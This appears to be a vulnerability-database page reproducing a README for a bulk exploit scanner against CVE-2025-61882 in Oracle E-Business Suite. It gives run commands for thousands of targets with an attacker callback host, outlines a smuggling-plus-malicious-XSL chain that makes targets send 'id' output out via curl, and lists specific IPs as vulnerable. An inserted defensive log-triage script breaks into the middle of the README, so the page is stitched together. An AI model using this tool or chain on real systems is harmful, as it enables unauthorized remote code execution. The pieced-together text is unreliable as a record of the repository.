Related vulnerabilities
Description
Exploit for CVE-2025-61882 (do not use without any written permission).
Introduction
# Oracle E-Business Suite RCE Scanner (CVE-2025-61882)
A fast, multi-threaded bulk scanner for detecting CVE-2025-61882 in Oracle E-Business Suite installations. This critical vulnerability allows unauthenticated remote code execution.



## 🎯 Features
- **Bulk Scanning** - Process hundreds or thousands of targets from a file
- **Multi-threaded** - Configurable concurrent scanning (default: 20 threads)
- **Automatic Detection** - Validates RCE by executing the `id` command and parsing its output
- **Real-time Results** - Vulnerable targets are written to `vuln-output.txt` immediately
- **Random Ports** - Uses random ports (2000-9999) for each target to avoid conflicts
- **Clean Output** - Progress tracking with minimal noise
## 📋 Requirements
```bash
pip install requests
```
That's it. Just Python 3.7+ and the `requests` library.
## 🚀 Installation
```bash
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
```
## 💻 Usage
### Basic Scan
```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
```
### Fast Scan (50 threads)
```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
```
### Conservative Scan (10 threads)
```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
```
## 📝 Target File Format
Create a `targets.txt` file with one URL per line:
```
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
```
## 📊 Output Example
```
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
```
## 📄 Output File
Results are saved to `vuln-output.txt`:
```
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
```
## 🔍 How It Works
1. **CSRF Token Retrieval** - Fetches a valid CSRF token from the target
2. **HTTP Request Smuggling** - Exploits the smuggling vulnerability to inject a malicious payload
3. **XSL Payload Delivery** - Serves a malicious XSL stylesheet that executes commands
4. **Callback Validation** - Target executes the `id` command and sends the output back via curl
5. **Regex Matching** - Validates successful RCE by checking for `uid=...gid=...` pattern
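
From the defender's side, the callback in steps 4 and 5 is the most observable part of this chain: an EBS application server making an outbound curl request to a high port, possibly with `id` output in it. The triage script below is an added example, not part of the scanner or this repository; the egress log format, host addresses and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Shape of `id` output, matching the README's sample results.
ID_OUTPUT = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+\([^)]*\)")
CALLBACK_PORTS = range(2000, 10000)  # README: random callback ports 2000-9999

# Assumed (hypothetical) egress log format:
#   timestamp src_ip dst_ip dst_port "METHOD uri" "user-agent"
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\d+) "(\S+) ([^"]*)" "([^"]*)"$')

EBS_HOSTS = {"10.20.0.15"}  # constructed: addresses of the EBS application tier

SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '2025-10-07T15:31:02Z 10.20.0.15 203.0.113.7 7893 '
    '"GET /?o=uid%3D54321(oracle)%20gid%3D54321(oinstall)" "curl/7.61.1"',
    '2025-10-07T15:31:40Z 10.20.0.15 203.0.113.7 5882 "POST /" "curl/7.61.1"',
    '2025-10-07T15:32:10Z 10.20.0.15 198.51.100.20 443 '
    '"GET /updates/index.xml" "Java/1.8.0_202"',
    '2025-10-07T15:33:00Z 10.20.0.99 203.0.113.7 7893 "GET /" "curl/7.61.1"',
]

def score_line(line, ebs_hosts):
    """Return a finding dict for a suspicious egress line, else None."""
    m = LINE.match(line.strip())
    if not m or m.group(2) not in ebs_hosts:
        return None
    ts, src, dst, port, _method, uri, agent = m.groups()
    reasons = []
    if int(port) in CALLBACK_PORTS:
        reasons.append("port-in-callback-range")
    if agent.lower().startswith("curl/"):
        reasons.append("curl-user-agent")
    # Decode twice so double URL-encoded command output is still seen.
    if ID_OUTPUT.search(unquote_plus(unquote_plus(uri))):
        reasons.append("id-output-in-request")
    if "id-output-in-request" in reasons:
        severity = "high"      # command output left the host
    elif len(reasons) >= 2:
        severity = "medium"    # callback-shaped traffic, body not logged
    else:
        return None
    return {"time": ts, "src": src, "dst": dst, "port": int(port),
            "severity": severity, "reasons": reasons}

def triage(lines, ebs_hosts=EBS_HOSTS):
    """Score every line and keep only the findings."""
    return [f for f in (score_line(l, ebs_hosts) for l in lines) if f]
```

Because the callback depends on the target reaching an external host, a default-deny egress policy on the EBS application tier both blocks this validation step and makes any attempt stand out in the logs.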
## ⚙️ Configuration
| Argument | Required | Default | Description |
|----------|----------|---------|-------------|
| `--targets` | Yes | - | Path to file containing target URLs |
| `--lhost` | Yes | - | Your VPS/attacker IP address |
| `--threads` | No | 20 | Number of concurrent threads |
## 🔒 Responsible Disclosure
This tool is for **authorized security testing only**. Always:
- ✅ Get written permission before testing
- ✅ Only scan systems you own or have explicit authorization to test
- ✅ Report findings responsibly to affected organizations
- ✅ Follow coordinated vulnerability disclosure practices
- ❌ Never use this on unauthorized systems
**Unauthorized access to computer systems is illegal.**
## 🐛 Known Issues
- Some targets may time out due to firewall/IDS blocking
- Callback detection requires the target to reach your VPS on random ports
- SSL certificate warnings are suppressed (expected for pentesting)
## 🤝 Contributing
Found a bug? Have a feature request?
1. Fork the repo
2. Create your feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add some feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request
## 📜 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## ⚠️ Disclaimer
This tool is provided for educational and authorized security testing purposes only. The author is not responsible for any misuse or damage caused by this tool. Use at your own risk.
## 📚 References
- [CVE-2025-61882 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-61882)
- [Oracle Critical Patch Update](https://www.oracle.com/security-alerts/)
---
<div align="center">
### 👨‍💻 Developed by [Chirag Artani](https://3rag.com)
**[Website](https://3rag.com)** • **[Twitter](https://twitter.com/chiragartani)** • **[LinkedIn](https://linkedin.com/in/chiragartani)**
Made with ❤️ for the infosec community
</div>
File snapshot
[4.0K] /data/pocs/5c998a28ef879d29246eab5f69a07358b752b573
├── [9.5K] cve-2025-61882.py
├── [6.2K] readmd
└── [5.8K] README.md
0 directories, 3 files